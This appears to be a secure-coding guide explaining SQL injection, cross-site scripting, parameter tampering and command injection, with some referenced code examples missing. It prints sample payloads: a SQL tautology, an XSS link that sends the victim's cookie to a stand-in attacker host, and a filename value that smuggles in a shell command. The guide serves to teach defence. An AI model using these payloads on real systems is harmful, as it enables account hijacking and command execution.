SQL Injections: Occurs when untrusted data is used to construct dynamic SQL statements using string concatenation. Consider the following example
If an attacker manipulated username and entered: "' or '1'='1". The query would read (attacker's payload in red
SELECT roles FROM userroles WHERE username ='' or '1'='1'
This query would give the attacker all the roles possible. There are several forms of SQL injections like blind SQL injection and others. They all share the main idea of using user-controllable data to construct SQL statements.
Cross-site Scripting: occurs when the application uses untrusted data to build HTML back to the browser. An attacker could use this vulnerability to inject malicious script into user's browser, possibly gaining full control over the user browsers.
Consider the following example:
If an attacker sent a link to victim as follows (attacker's payload in red): www.vulnerableapp.com/vulnerablefile.jsp?msg=<script>document.write("<img+src='www.hackersite.com?id='"%2bdocument.cookie%2b"'>")</script>
If the user clicked on that link, their cookie will be transmitted to the attacker, which they can use to hijack the victim's account. Another more dangerous version of this attack, called persistent cross-site scripting, is where the payload actually is persistent in the database and uses could get infected by simply browsing to the page that serve's the attacker's payload. Check the UI Framework Reference Guide for more information on how to prevent XSS.
Parameter Tampering: occurs when the application does nor perform user entitlement checks before retrieving the user's records from the data store (e.g. database). Consider the following example:
Now, an attacker could retrieve any record by simply iterating through the "recordID" parameter.
Command Injection: Occurs when the application uses untrusted data (e.g. data retrieved from the request) in constructing and executing system commands.
Now, an attacker could supply the following (attacker's payload in red): www.vulnerableapp.com?filename=test.doc;mkdir+hacked
This will end the application's command: "ziputility.exe test.com" and will start another command which the attacker has full control over.